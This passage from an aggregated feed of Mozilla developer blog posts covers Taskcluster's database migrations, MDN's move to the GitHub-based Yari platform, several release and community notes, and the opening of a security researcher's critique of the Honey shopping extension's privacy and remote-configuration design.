
This redefines two existing functions to operate properly against the new table. The functions are redefined in the same database transaction as the migrationScript above, meaning that any calls to create_secret or get_secret will immediately begin populating the new column. A critical rule (enforced in code) is that the arguments and return type of a function cannot be changed.
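
As a rough illustration of how an upgrade step like this could be applied, here is a hypothetical JavaScript sketch. It is not Taskcluster’s actual upgrade code: db.transaction, tx.query, redefineStoredFunction, and the db_version table are all assumed names standing in for the real machinery.

async function applyVersion(db, version) {
  // Run the migration script and the stored-function redefinitions atomically,
  // so callers only ever see a consistent schema/function pair.
  await db.transaction(async (tx) => {
    await tx.query(version.migrationScript);
    for (const [name, method] of Object.entries(version.methods || {})) {
      await redefineStoredFunction(tx, name, method);
    }
    await tx.query("update db_version set version = $1", [version.version]);
  });
}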

To support new code that references the last_used value, we add a new function:

  get_secret_with_last_used:
    args: name text
    returns: record
    body: |-
      begin
        update secrets
        set last_used = now()
        where secrets.name = get_secret_with_last_used.name;

        return query
        select name, value, last_used from secrets
        where secrets.name = get_secret_with_last_used.name;
      end

Another critical rule is that DB migrations must be applied fully before the corresponding version of the JS code is deployed. In this case, that means code that uses get_secret_with_last_used is deployed only after the function is defined.

All of this can be thoroughly tested in isolation from the rest of the Taskcluster code, both unit tests for the functions and integration tests for the upgrade and downgrade scripts. Unit tests for redefined functions should continue to pass, unchanged, providing an easy-to-verify compatibility check.

Phase 2 Migrations

The migrations from Azure-style tables to normal tables are, as you might guess, a lot more complex than this simple example, and we faced a number of tricky issues along the way.

We split the work of performing these migrations across the members of the Taskcluster team, supporting each other through the tricky bits, in a rather long but ultimately successful “Postgres Phase 2” sprint.

0042 - secrets phase 2

Let’s look at one of the simpler examples: the secrets service. The migration script creates a new secrets table from the data in the secrets_entities table, using Postgres’s JSON functions to unpack the value column into “normal” columns.

The database version YAML file carefully redefines the Azure-compatible DB functions to access the new secrets table. This involves unpacking function arguments from their JSON formats, re-packing JSON blobs for return values, and even some light parsing of the condition string for the secrets_entities_scan function.

It then defines new stored functions for direct access to the normal table. These functions are typically similar, and more specific to the needs of the service. For example, the secrets service only modifies secrets in an “upsert” operation that replaces any existing secret of the same name.

Step By Step

To achieve an extra layer of confidence in our work, we landed all of the phase-2 PRs in two steps. The first step included migration and downgrade scripts and the redefined stored functions, as well as tests for those. But critically, this step did not modify the service using the table (the secrets service in this case). So the unit tests for that service use the redefined stored functions, acting as a kind of integration-test for their implementations. This also validates that the service will continue to run in production between the time the database migration is run and the time the new code is deployed. We landed this step on GitHub in such a way that reviewers could see a green check-mark on the step-1 commit.

In the second step, we added the new, purpose-specific stored functions and rewrote the service to use them. In services like secrets, this was a simple change, but some other services saw more substantial rewrites due to more complex requirements.

Deprecation

Naturally, we can’t continue to support old functions indefinitely: eventually they would be prohibitively complex or simply impossible to implement. Another deployment rule provides a critical escape from this trap: Taskcluster must be upgraded at most one major version at a time (e.g., 36.x to 37.x). That provides a limited window of development time during which we must maintain compatibility.

Defining that window is surprisingly tricky, but essentially it’s two major revisions. Like the software engineers we are, we packaged up that tricky computation in a script, and include the lifetimes in some generated documentation.

What’s Next?

This post has hinted at some of the complexity of “phase 2”. There are lots of details omitted, of course!

But there’s one major detail that got us in a bit of trouble. In fact, we were forced to roll back during a planned migration – not an engineer’s happiest moment. The queue_tasks_entities and queue_artifacts_entities tables were just too large to migrate in any reasonable amount of time. Part 3 will describe what happened, how we fixed the issue, and what we’re doing to avoid having the same issue again.

Daniel StenbergEverything curl in Chinese

The other day we celebrated everything curl turning 5 years old, and not too long after that I got myself this printed copy of the Chinese translation in my hands!

This version of the book is available for sale on Amazon and the translation was done by the publisher.

The book’s full contents are available on github and you can read the English version online on ec.haxx.se.

If you would be interested in starting a translation of the book into another language, let me know and I’ll help you get started. Currently the English version consists of 72,798 words so it’s by no means an easy feat to translate! My two other smaller books, http2 explained and HTTP/3 explained, have been translated into twelve(!) and ten languages this way (and there might be more languages coming!).

<figcaption>A collection of printed works authored by yours truly!</figcaption>
<figcaption>Inside the Chinese version – yes I can understand some headlines!</figcaption>

Unfortunately I don’t read Chinese so I can’t tell you how good the translation is!

Mozilla Addons BlogContribute to selecting new Recommended extensions

Recommended extensions—a curated list of extensions that meet Mozilla’s highest standards of security, functionality, and user experience—are in part selected with input from a rotating editorial board of community contributors. Each board runs for six consecutive months and evaluates a small batch of new Recommended candidates each month. The board’s evaluation plays a critical role in helping identify new potential Recommended additions.

We are now accepting applications for community board members through 18 November. If you would like to nominate yourself for consideration on the board, please email us at amo-featured [at] mozilla [dot] org and provide a brief explanation why you feel you’d make a keen evaluator of Firefox extensions. We’d love to hear about how you use extensions and what you find so remarkable about browser customization. You don’t have to be an extension developer to effectively evaluate Recommended candidates (though indeed many past board members have been developers themselves), however you should have a strong familiarity with extensions and be comfortable assessing the strengths and flaws of their functionality and user experience.

Selected contributors will participate in a six-month project that runs from December – May.

Here’s the entire collection of Recommended extensions, if you’re curious to explore what’s currently curated.

Thank you and we look forward to hearing from interested contributors by the 18 November application deadline!

The post Contribute to selecting new Recommended extensions appeared first on Mozilla Add-ons Blog.

Hacks.Mozilla.OrgMDN Web Docs evolves! Lowdown on the upcoming new platform

Update, November 3: The Yari beta phase is now open, so we’ve removed the beta signup form from this post. If you want to participate in beta testing, you can find the details on our Yari beta launch explainer.

The time has come for Kuma — the platform that powers MDN Web Docs — to evolve. For quite some time now, the MDN developer team has been planning a radical platform change, and we are ready to start sharing the details of it. The question on your lips might be “What does a Kuma evolve into? A KumaMaMa?”

What? Kuma is evolving!

For those of you not so into Pokémon, the question might instead be “How exactly is MDN changing, and how does it affect MDN users and contributors”?

For general users, the answer is easy — there will be very little change to how we serve the great content you use every day to learn and do your jobs.

For contributors, the answer is a bit more complex.

The changes in a nutshell

In short, we are updating the platform to move the content from a MySQL database to being hosted in a GitHub repository (codename: Project Yari).

Congratulations! Your Kuma evolved into Yari

The main advantages of this approach are:

  • Less developer maintenance burden: The existing (Kuma) platform is complex and hard to maintain. Adding new features is very difficult. The update will vastly simplify the platform code — we estimate that we can remove a significant chunk of the existing codebase, meaning easier maintenance and contributions.
  • Better contribution workflow: We will be using GitHub’s contribution tools and features, essentially moving MDN from a Wiki model to a pull request (PR) model. This is so much better for contribution, allowing for intelligent linting, mass edits, and inclusion of MDN docs in whatever workflows you want to add it to (you can edit MDN source files directly in your favorite code editor).
  • Better community building: At the moment, MDN content edits are published instantly, and then reverted if they are not suitable. This is really bad for community relations. With a PR model, we can review edits and provide feedback, actually having conversations with contributors, building relationships with them, and helping them learn.
  • Improved front-end architecture: The existing MDN platform has a number of front-end inconsistencies and accessibility issues, which we’ve wanted to tackle for some time. The move to a new, simplified platform gives us a perfect opportunity to fix such issues.

The exact form of the platform is yet to be finalized, and we want to involve you, the community, in helping to provide ideas and test the new contribution workflow! We will have a beta version of the new platform ready for testing on November 2, and the first release will happen on December 14.

Simplified back-end platform

We are replacing the current MDN Wiki platform with a JAMStack approach, which publishes the content managed in a GitHub repo. This has a number of advantages over the existing Wiki platform, and is something we’ve been considering for a number of years.

Before we discuss our new approach, let’s review the Wiki model so we can better understand the changes we’re making.

Current MDN Wiki platform


workflow diagram of the old kuma platform

It’s important to note that both content contributors (writers) and content viewers (readers) are served via the same architecture. That architecture has to accommodate both use cases, even though more than 99% of our traffic comprises document page requests from readers. Currently, when a document page is requested, the latest version of the document is read from our MySQL database, rendered into its final HTML form, and returned to the user via the CDN.

That document page is stored and served from the CDN’s cache for the next 5 minutes, so subsequent requests — as long as they’re within that 5-minute window — will be served directly by the CDN. That caching period of 5 minutes is kept deliberately short, mainly due to the fact that we need to accommodate the needs of the writers. If we only had to accommodate the needs of the readers, we could significantly increase the caching period and serve our document pages more quickly, while at the same time reducing the workload on our backend servers.

You’ll also notice that because MDN is a Wiki platform, we’re responsible for managing all of the content, and tasks like storing document revisions, displaying the revision history of a document, displaying differences between revisions, and so on. Currently, the MDN development team maintains a large chunk of code devoted to just these kinds of tasks.

New MDN platform


workflow diagram of the new yari platform

With the new JAMStack approach, the writers are served separately from the readers. The writers manage the document content via a GitHub repository and pull request model, while the readers are served document pages more quickly and efficiently via pre-rendered document pages served from S3 via a CDN (which will have a much longer caching period). The document content from our GitHub repository will be rendered and deployed to S3 on a daily basis.

You’ll notice, from the diagram above, that even with this new approach, we still have a Kubernetes cluster with Django-based services relying on a relational database. The important thing to remember is that this part of the system is no longer involved with the document content. Its scope has been dramatically reduced, and it now exists solely to provide APIs related to user accounts (e.g. login) and search.

This separation of concerns has multiple benefits, the most important three of which are as follows:

  • First, the document pages are served to readers in the simplest, quickest, and most efficient way possible. That’s really important, because 99% of MDN’s traffic is for readers, and worldwide performance is fundamental to the user experience.
  • Second, because we’re using GitHub to manage our document content, we can take advantage of the world-class functionality that GitHub has to offer as a content management system, and we no longer have to support the large body of code related to our current Wiki platform. It can simply be deleted.
  • Third, and maybe less obvious, is that this new approach brings more power to the platform. We can, for example, perform automated linting and testing on each content pull request, which allows us to better control quality and security.

New contribution workflow

Because MDN content is soon to be contained in a GitHub repo, the contribution workflow will change significantly. You will no longer be able to click Edit on a page, make and save a change, and have it show up nearly immediately on the page. You’ll also no longer be able to do your edits in a WYSIWYG editor.

Instead, you’ll need to use git/GitHub tooling to make changes, submit pull requests, then wait for changes to be merged, the new build to be deployed, etc. For very simple changes such as fixing typos or adding new paragraphs, this may seem like a step back — Kuma is certainly convenient for such edits, and for non-developer contributors.

However, making a simple change is arguably no more complex with Yari. You can use the GitHub UI’s edit feature to directly edit a source file and then submit a PR, meaning that you don’t have to be a git genius to contribute simple fixes.

For more complex changes, you’ll need to use the git CLI tool, or a GUI tool like GitHub Desktop, but then again git is such a ubiquitous tool in the web industry that it is safe to say that if you are interested in editing MDN, you will probably need to know git to some degree for your career or course. You could use this as a good opportunity to learn git if you don’t know it already! On top of that there is a file system structure to learn, and some new tools/commands to get used to, but nothing terribly complex.

Another possible challenge to mention is that you won’t have a WYSIWYG to instantly see what the page looks like as you add your content, and in addition you’ll be editing raw HTML, at least initially (we are talking about converting the content to markdown eventually, but that is a bit of a ways off). Again, this sounds like a step backwards, but we are providing a tool inside the repo so that you can locally build and preview the finished page to make sure it looks right before you submit your pull request.

Looking at the advantages now, consider that making MDN content available as a GitHub repo is a very powerful thing. We no longer have spam content live on the site, with us then having to revert the changes after the fact. You are also free to edit MDN content in whatever way suits you best — your favorite IDE or code editor — and you can add MDN documentation into your preferred toolchain (and write your own tools to edit your MDN editing experience). A lot of engineers have told us in the past that they’d be much happier to contribute to MDN documentation if they were able to submit pull requests, and not have to use a WYSIWYG!

We are also looking into a powerful toolset that will allow us to enhance the reviewing process, for example as part of a CI process — automatically detecting and closing spam PRs, and as mentioned earlier on, linting pages once they’ve been edited, and delivering feedback to editors.

Having MDN in a GitHub repo also offers much easier mass edits; blanket content changes have previously been very difficult.

Finally, the “time to live” should be acceptable — we are aiming to have a quick turnaround on the reviews, and the deployment process will be repeated every 24 hours. We think that your changes should be live on the site in 48 hours as a worst case scenario.

Better community building

Currently MDN is not a very lively place in terms of its community. We have a fairly active learning forum where people ask beginner coding questions and seek help with assessments, but there is not really an active place where MDN staff and volunteers get together regularly to discuss documentation needs and contributions.

Part of this is down to our contribution model. When you edit an MDN page, either your contribution is accepted and you don’t hear anything, or your contribution is reverted and you … don’t hear anything. You’ll only know either way by looking to see if your edit sticks, is counter-edited, or is reverted.

This doesn’t strike us as very friendly, and I think you’ll probably agree. When we move to a git PR model, the MDN community will be able to provide hands-on assistance in helping people to get their contributions right — offering assistance as we review their PRs (and offering automated help too, as mentioned previously) — and also thanking people for their help.

It’ll also be much easier for contributors to show how many contributions they’ve made, and we’ll be adding in-page links to allow people to file an issue on a specific page or even go straight to the source on GitHub and fix it themselves, if a problem is encountered.

In terms of finding a good place to chat about MDN content, you can join the discussion on the MDN Web Docs chat room on Matrix.

Improved front-end architecture

The old Kuma architecture has a number of front-end issues. Historically we have lacked a well-defined system that clearly describes the constraints we need to work within, and what our site features look like, and this has led to us ending up with a bloated, difficult to maintain front-end code base. Working on our current HTML and CSS is like being on a roller coaster with no guard-rails.

To be clear, this is not the fault of any one person, or any specific period in the life of the MDN project. There are many little things that have been left to fester, multiply, and rot over time.

Among the most significant problems are:

  • Accessibility: There are a number of accessibility problems with the existing architecture that really should be sorted out, but were difficult to get a handle on because of Kuma’s complexity.
  • Component inconsistency: Kuma doesn’t use a proper design system — similar items are implemented in different ways across the site, so implementing features is more difficult than it needs to be.

When we started to move forward with the back-end platform rewrite, it felt like the perfect time to again propose the idea of a design system. After many conversations leading to an acceptable compromise being reached, our design system — MDN Fiori — was born.

Front-end developer Schalk Neethling and UX designer Mustafa Al-Qinneh took a whirlwind tour through the core of MDN’s reference docs to identify components and document all the inconsistencies we are dealing with. As part of this work, we also looked for areas where we can improve the user experience, and introduce consistency through making small changes to some core underlying aspects of the overall design.

This included a defined color palette, simple, clean typography based on a well-defined type scale, consistent spacing, improved support for mobile and tablet devices, and many other small tweaks. This was never meant to be a redesign of MDN, so we had to be careful not to change too much. Instead, we played to our existing strengths and made rogue styles and markup consistent with the overall project.

Besides the visual consistency and general user experience aspects, our underlying codebase needed some serious love and attention — we decided on a complete rethink. Early on in the process it became clear that we needed a base library that was small, nimble, and minimal. Something uniquely MDN, but that could be reused wherever the core aspects of the MDN brand were needed. For this purpose we created MDN-Minimalist, a small set of core atoms that power the base styling of MDN, in a progressively enhanced manner, taking advantage of the beautiful new layout systems we have access to on the web today.

Each component that is built into Yari is styled with MDN-Minimalist, and also has its own style sheet that lives right alongside to apply further styles only when needed. This is an evolving process as we constantly rethink how to provide a great user experience while staying as close to the web platform as possible. The reason for this is twofold:

  • First, it means less code. It means less reinventing of the wheel. It means a faster, leaner, less bandwidth-hungry MDN for our end users.
  • Second, it helps address some of the accessibility issues we have begrudgingly been living with for some time, which are simply not acceptable on a modern web site. One of Mozilla’s accessibility experts, Marco Zehe, has given us a lot of input to help overcome these. We won’t fix everything in our first iteration, but our pledge to all of our users is that we will keep improving and we welcome your feedback on areas where we can improve further.

A wise person once said that the best way to ensure something is done right is to make doing the right thing the easy thing to do. As such, along with all of the work already mentioned, we are documenting our front-end codebase, design system, and pattern library in Storybook (see Storybook files inside the yari repo) with companion design work in Figma (see typography example) to ensure there is an easy, public reference for anyone who wishes to contribute to MDN from a code or design perspective. This in itself is a large project that will evolve over time. More communication about its evolution will follow.

The future of MDN localization

One important part of MDN’s content that we have talked about a lot during the planning phase is the localized content. As you probably already know, MDN offers facilities for translating the original English content and making the localizations available alongside it.

This is good in principle, but the current system has many flaws. When an English page is moved, the localizations all have to be moved separately, so pages and their localizations quite often go out of sync and get in a mess. And a bigger problem is that there is no easy way of signalling that the English version has changed to all the localizers.

General management is probably the most significant problem. You often get a wave of enthusiasm for a locale, and lots of translations done. But then after a number of months interest wanes, and no-one is left to keep the translations up to date. The localized content becomes outdated, which is often harmful to learning, becomes a maintenance time-suck, and as a result, is often considered worse than having no localizations at all.

Note that we are not saying this is true of all locales on MDN, and we are not trying to downplay the amount of work volunteers have put into creating localized content. For that, we are eternally grateful. But the fact remains that we can’t carry on like this.

We did a bunch of research, and talked to a lot of non-native-English speaking web developers about what would be useful to them. We reached two interesting conclusions:

  1. We stand to experience a significant but manageable loss of users if we remove or reduce our localization support. 8 languages cover 90% of the accept-language headers received from MDN users (en, zh, es, ja, fr, ru, pt, de), while 14 languages cover 95% of the accept-language headers (en, zh, es, ja, fr, ru, pt, de, ko, zh-TW, pl, it, nl, tr). We estimate that we would lose at most 19% of our traffic if we dropped L10n entirely.
  2. Machine translations are an acceptable solution in most cases, if not a perfect one. We looked at the quality of translations provided by automated solutions such as Google Translate and got some community members to compare these translations to manual translations. The machine translations were imperfect, and sometimes hard to understand, but many people commented that a non-perfect language that is up-to-date is better than a perfect language that is out-of-date. We appreciate that some languages (such as CJK languages) fare less well than others with automated translations.

So what did we decide? With the initial release of the new platform, we are planning to include all translations of all of the current documents, but in a frozen state. Translations will exist in their own mdn/translated-content repository, to which we will not accept any pull requests. The translations will be shown with a special header that says “This is an archived translation. No more edits are being accepted.” This is a temporary stage until we figure out the next step.

Note: In addition, the text of the UI components and header menu will be in English only, going forward. They will not be translated, at least not initially.

After the initial release, we want to work with you, the community, to figure out the best course of action to move forward with for translations. We would ideally rather not lose localized content on MDN, but we need to fix the technical problems of the past, manage it better, and ensure that the content stays up-to-date.

We will be planning the next phase of MDN localization with the following guiding principles:

  • We should never have outdated localized content on MDN.
  • Manually localizing all MDN content in a huge range of locales seems infeasible, so we should drop that approach.
  • Losing ~20% of traffic is something we should avoid, if possible.

We are making no promises about deliverables or time frames yet, but we have started to think along these lines:

  • Cut down the number of locales we are handling to the top 14 locales that give us 95% of our recorded accept-language headers.
  • Initially include non-editable Machine Learning-based automated translations of the “tier-1” MDN content pages (i.e. a set of the most important MDN content that excludes the vast long tail of articles that get no, or nearly no views). Ideally we’d like to use the existing manual translations to train the Machine Learning system, hopefully getting better results. This is likely to be the first thing we’ll work on in 2021.
  • Regularly update the automated translations as the English content changes, keeping them up-to-date.
  • Start to offer a system whereby we allow community members to improve the automated translations with manual edits. This would require the community to ensure that articles are kept up-to-date with the English versions as they are updated.

Acknowledgements

I’d like to thank my colleagues Schalk Neethling, Ryan Johnson, Peter Bengtsson, Rina Tambo Jensen, Hermina Condei, Melissa Thermidor, and anyone else I’ve forgotten who helped me polish this article with bits of content, feedback, reviews, edits, and more.

The post MDN Web Docs evolves! Lowdown on the upcoming new platform appeared first on Mozilla Hacks - the Web developer blog.

Mike Taylor.www filename flags in web-platform-tests

I added a small feature to web-platform-tests that allows you to load a test automatically on the www subdomain by using a .www filename flag (here’s the original issue).

So like, if you ever need to load a page on a different subdomain to test some kind of origin-y or domainy-y thing, you can just name your test something amazing like origin-y-test.www.html and it will open the test for you at www.web-platform.test (rather than web-platform.test, or similarly, however your system or server is configured).
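If you want a feel for it, here’s a minimal sketch of what such a test could look like. The file name and assertion are made up for illustration, not an existing test in the suite:

<!-- origin-y-test.www.html -->
<!DOCTYPE html>
<meta charset="utf-8">
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<script>
test(() => {
  // The .www filename flag makes the harness serve this page from the
  // www subdomain, so the hostname should start with "www.".
  assert_true(location.hostname.startsWith("www."));
}, "page is served from the www subdomain");
</script>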

Now you’ll never need to embed an <iframe> or call window.open() ever again (unless you actually need to do those things).

🎃

Dustin J. MitchellTaskcluster's DB (Part 1) - Azure to Postgres

This is a deep-dive into some of the implementation details of Taskcluster. Taskcluster is a platform for building continuous integration, continuous deployment, and software-release processes. It’s an open source project that began life at Mozilla, supporting the Firefox build, test, and release systems.

The Taskcluster “services” are a collection of microservices that handle distinct tasks: the queue coordinates tasks; the worker-manager creates and manages workers to execute tasks; the auth service authenticates API requests; and so on.

Azure Storage Tables to Postgres

Until April 2020, Taskcluster stored its data in Azure Storage tables, a simple NoSQL-style service similar to AWS’s DynamoDB. Briefly, each Azure table is a list of JSON objects with a single primary key composed of a partition key and a row key. Lookups by primary key are fast and parallelize well, but scans of an entire table are extremely slow and subject to API rate limits. Taskcluster was carefully designed within these constraints, but that meant that some useful operations, such as listing tasks by their task queue ID, were simply not supported. Switching to a fully-relational datastore would enable such operations, while easing deployment of the system for organizations that do not use Azure.

Always Be Migratin’

In April, we migrated the existing deployments of Taskcluster (at that time all within Mozilla) to Postgres. This was a “forklift migration”, in the sense that we moved the data directly into Postgres with minimal modification. Each Azure Storage table was imported into a single Postgres table of the same name, with a fixed structure:

create table queue_tasks_entities(
    partition_key text,
    row_key text,
    value jsonb not null,
    version integer not null,
    etag uuid default public.gen_random_uuid()
);
alter table queue_tasks_entities add primary key (partition_key, row_key);

The importer we used was specially tuned to accomplish this import in a reasonable amount of time (hours). For each known deployment, we scheduled a downtime to perform this migration, after extensive performance testing on development copies.

We considered options to support a downtime-free migration. For example, we could have built an adapter that would read from Postgres and Azure, but write to Postgres. This adapter could support production use of the service while a background process copied data from Azure to Postgres.

This option would have been very complex, especially in supporting some of the atomicity and ordering guarantees that the Taskcluster API relies on. Failures would likely lead to data corruption and a downtime much longer than the simpler, planned downtime. So, we opted for the simpler, planned migration. (We’ll revisit the idea of online migrations in part 3.)

The database for Firefox CI occupied about 350GB. The other deployments, such as the community deployment, were much smaller.

Database Interface

All access to Azure Storage tables had been via the azure-entities library, with a limited and very regular interface (hence the _entities suffix on the Postgres table name). We wrote an implementation of the same interface, but with a Postgres backend, in taskcluster-lib-entities. The result was that none of the code in the Taskcluster microservices changed. Not changing code is a great way to avoid introducing new bugs! It also limited the complexity of this change: we only had to deeply understand the semantics of azure-entities, and not the details of how the queue service handles tasks.

Stored Functions

As the taskcluster-lib-entities README indicates, access to each table is via five stored database functions:

  • <tableName>_load - load a single row
  • <tableName>_create - create a new row
  • <tableName>_remove - remove a row
  • <tableName>_modify - modify a row
  • <tableName>_scan - return some or all rows in the table

Stored functions are functions defined in the database itself, that can be redefined within a transaction. Part 2 will get into why we made this choice.

Optimistic Concurrency

The modify function is an interesting case. Azure Storage has no notion of a “transaction”, so the azure-entities library uses an optimistic-concurrency approach to implement atomic updates to rows. This uses the etag column, which changes to a new value on every update, to detect and retry concurrent modifications. While Postgres can do much better, we replicated this behavior in taskcluster-lib-entities, again to limit the changes made and avoid introducing new bugs.

A modification looks like this in Javascript:

await task.modify(task => {
  if (task.status !== 'running') {
    task.status = 'running';
    task.started = now();
  }
});

For those not familiar with JS notation, this is calling the modify method on a task, passing a modifier function which, given a task, modifies that task. The modify method calls the modifier and tries to write the updated row to the database, conditioned on the etag still having the value it did when the task was loaded. If the etag does not match, modify re-loads the row to get the new etag, and tries again until it succeeds. The effect is that updates to the row occur one-at-a-time.

This approach is “optimistic” in the sense that it assumes no conflicts, and does extra work (retrying the modification) only in the unusual case that a conflict occurs.
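
To make the retry loop concrete, here is a hypothetical JavaScript sketch of how such a modify method could work. The loadRow and writeRowIfEtagMatches helpers are assumptions standing in for calls to the stored functions; this is not the actual taskcluster-lib-entities code.

async function modify(partitionKey, rowKey, modifier) {
  while (true) {
    // Load the current row, including its etag.
    const row = await loadRow(partitionKey, rowKey);
    const updated = { ...row.value };
    modifier(updated);

    // Write back only if the etag is unchanged since the load.
    const wrote = await writeRowIfEtagMatches(partitionKey, rowKey, updated, row.etag);
    if (wrote) {
      return updated;
    }
    // Conflict: another writer changed the row first, so reload and retry.
  }
}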

What’s Next?

At this point, we had fork-lifted Azure tables into Postgres and no longer required an Azure account to run Taskcluster. However, we hadn’t yet seen any of the benefits of a relational database:

  • data fields were still trapped in a JSON object (in fact, some kinds of data were hidden in base64-encoded blobs)
  • each table still only had a single primary key, and queries by any other field would still be prohibitively slow
  • joins between tables would also be prohibitively slow

Part 2 of this series of articles will describe how we addressed these issues. Then part 3 will get into the details of performing large-scale database migrations without downtime.

Mozilla Addons BlogExtensions in Firefox 83

In addition to our brief update on extensions in Firefox 83, this post contains information about changes to the Firefox release calendar and a feature preview for Firefox 84.

Thanks to a contribution from Richa Sharma, the error message logged when tabs.sendMessage is passed an invalid tab ID is now much easier to understand. It had regressed to a generic message due to a previous refactoring.

End of Year Release Calendar

The end of 2020 is approaching (yay?), and as usual people will be taking time off and will be less available. To account for this, the Firefox Release Calendar has been updated to extend the Firefox 85 release cycle by 2 weeks. We will release Firefox 84 on 15 December and Firefox 85 on 26 January. The regular 4-week release cadence should resume after that.

Coming soon in Firefox 84: Manage Optional Permissions in Add-ons Manager

Starting with Firefox 84, currently available on the Nightly pre-release channel, users will be able to manage optional permissions of installed extensions from the Firefox Add-ons Manager (about:addons).

Optional permissions in about:addons

We recommend that extensions using optional permissions listen for the browser.permissions.onAdded and browser.permissions.onRemoved API events. This ensures the extension is aware of the user granting or revoking optional permissions.
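
A minimal sketch of wiring up those listeners in an extension’s background script (the logging is just for illustration):

browser.permissions.onAdded.addListener((permissions) => {
  // permissions.permissions lists the API permissions the user just granted,
  // permissions.origins lists the granted host permissions.
  console.log("granted:", permissions.permissions, permissions.origins);
});

browser.permissions.onRemoved.addListener((permissions) => {
  console.log("revoked:", permissions.permissions, permissions.origins);
});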

The post Extensions in Firefox 83 appeared first on Mozilla Add-ons Blog.

Will Kahn-GreeneEverett v1.0.3 released!

What is it?

Everett is a configuration library for Python apps.

Goals of Everett:

  1. flexible configuration from multiple configured environments

  2. easy testing with configuration

  3. easy documentation of configuration for users

From that, Everett has the following features:

  • is composeable and flexible

  • makes it easier to provide helpful error messages for users trying to configure your software

  • supports auto-documentation of configuration with a Sphinx autocomponent directive

  • has an API for testing configuration variations in your tests

  • can pull configuration from a variety of specified sources (environment, INI files, YAML files, dict, write-your-own)

  • supports parsing values (bool, int, lists of things, classes, write-your-own)

  • supports key namespaces

  • supports component architectures

  • works with whatever you're writing--command line tools, web sites, system daemons, etc

v1.0.3 released!

This is a minor maintenance update that fixes a couple of minor bugs, addresses a Sphinx deprecation issue, drops support for Python 3.4 and 3.5, and adds support for Python 3.8 and 3.9 (largely adding those environments to the test suite).

Why you should take a look at Everett

At Mozilla, I'm using Everett for a variety of projects: Mozilla symbols server, Mozilla crash ingestion pipeline, and some other tooling. We use it in a bunch of other places at Mozilla, too.

Everett makes it easy to:

  1. deal with different configurations between local development and server environments

  2. test different configuration values

  3. document configuration options

First-class docs. First-class configuration error help. First-class testing. This is why I created Everett.

If this sounds useful to you, take it for a spin. It's a drop-in replacement for python-decouple and os.environ.get('CONFIGVAR', 'default_value') style of configuration so it's easy to test out.

Enjoy!

Where to go for more

For more specifics on this release, see here: https://everett.readthedocs.io/en/latest/history.html#october-28th-2020

Documentation and quickstart here: https://everett.readthedocs.io/

Source code and issue tracker here: https://github.com/willkg/everett

Wladimir PalantWhat would you risk for free Honey?

Honey is a popular browser extension built by the PayPal subsidiary Honey Science LLC. It promises nothing less than preventing you from wasting money on your online purchases. Whenever possible, it will automatically apply promo codes to your shopping cart, thus saving your money without you lifting a finger. And it even runs a reward program that will give you some money back! Sounds great, what’s the catch?

With such offers, the price you pay is usually your privacy. With Honey, it’s also security. The browser extension is highly reliant on instructions it receives from its server. I found at least four ways for this server to run arbitrary code on any website you visit. So the extension can mutate into spyware or malware at any time, for all users or only for a subset of them – without leaving any traces of the attack like a malicious extension release.

Flies buzzing around an open honeypot, despite the fly swatter nearby.<figcaption> Image credits: Honey, Glitch, Firkin, j4p4n </figcaption>

The trouble with shopping assistants

Please note that there are objective reasons why it’s really hard to build a good shopping assistant. The main issue is how many online shops there are. Honey supports close to 50 thousand shops, yet I easily found a bunch of shops that were missing. Even the shops based on the same engine are typically customized and might have subtle differences in their behavior. Not just that, they will also change without an advance warning. Supporting this zoo is far from trivial.

Add to this the fact that with most of these shops there is very little money to be earned. A shopping assistant needs to work well with Amazon and Shopify. But supporting everything else has to come at close to no cost whatsoever.

The resulting design choices are the perfect recipe for a privacy nightmare:

  • As much server-side configuration as somehow possible, to avoid releasing new extension versions unnecessarily
  • As much data extraction as somehow possible, to avoid manual monitoring of shop changes
  • Bad code quality with many inconsistent approaches, because improving code is costly

I looked into Honey primarily due to its popularity, it being used by more than 17 million users according to the statement on the product’s website. Given the above, I didn’t expect great privacy choices. And while I haven’t seen anything indicating malice, the poor choices made still managed to exceed my expectations by far.

Unique user identifiers

By now you are probably used to reading statements like the following in company’s privacy statements:

None of the information that we collect from these events contains any personally identifiable information (PII) such as names or email addresses.

But of course a persistent semi-random user identifier doesn’t count as “personally identifiable information.” So Honey creates several of those and sends them with every request to its servers:

HTTP headers sent with requests to joinhoney.com

Here you see the exv value in the Cookie header: it is a combination of the extension version, a user ID (bound to the Honey account if any) and a device ID (locally generated random value, stored persistently in the extension data). The same value is also sent with the payload of various requests.

If you are logged into your Honey account, there will also be x-honey-auth-at and x-honey-auth-rt headers. These are an access and a refresh token respectively. It’s not that these are required (the server will produce the same responses regardless) but they once again associate your requests with your Honey account.

So that’s where this Honey privacy statement is clearly wrong: while the data collected doesn’t contain your email address, Honey makes sure to associate it with your account among other things. And the account is tied to your email address. If you were careless enough to enter your name, there will be a name associated with the data as well.

Remote configure everything

Out of the box, the extension won’t know what to do. Before it can do anything at all, it first needs to ask the server which domains it is supposed to be active on. The result is currently a huge list with some of the most popular domains like google.com, bing.com or microsoft.com listed.

Clearly, not all of google.com is an online shop. So when you visit one of the “supported” domains for the first time within a browsing session, the extension will request additional information:

Honey asking its server for shops under the google.com domain

Now the extension knows to ignore all of google.com but the shops listed here. It still doesn’t know anything about the shops however, so when you visit Google Play for example there will be one more request:

Google Play metadata returned by Honey server

The metadata part of the response is most interesting as it determines much of the extension’s behavior on the respective website. For example, there are optional fields pns_siteSelSubId1 to pns_siteSelSubId3 that determine what information the extension sends back to the server later:

Honey sending three empty subid fields to the server

Here the field subid1 and similar are empty because pns_siteSelSubId1 is missing in the store configuration. Were it present, Honey would use it as a CSS selector to find a page element, extract its text and send that text back to the server. Good if somebody wants to know what exactly people are looking at.
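
To sketch what that would amount to if the selector were present (the selector value below is made up, and this is not Honey’s actual code):

const storeMetadata = { pns_siteSelSubId1: "#productTitle" };  // hypothetical value

const subid1 = storeMetadata.pns_siteSelSubId1
  ? $(storeMetadata.pns_siteSelSubId1).first().text().trim()
  : "";

// subid1 would then be included in the request sent back to the Honey server.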

Mind you, I only found this functionality enabled on amazon.com and macys.com, yet the selectors provided appear to be outdated and do not match anything. So is this some outdated functionality that is no longer in use and that nobody bothered removing yet? Very likely. Yet it could jump to life any time to collect more detailed information about your browsing habits.

The highly flexible promo code applying process

As you can imagine, the process of applying promo codes can vary wildly between different shops. Yet Honey needs to do it somehow without bothering the user. So while store configuration normally tends to stick to CSS selectors, for this task it will resort to JavaScript code. For example, you get the following configuration for hostgator.com:

Store configuration for hostgator.com containing JavaScript code

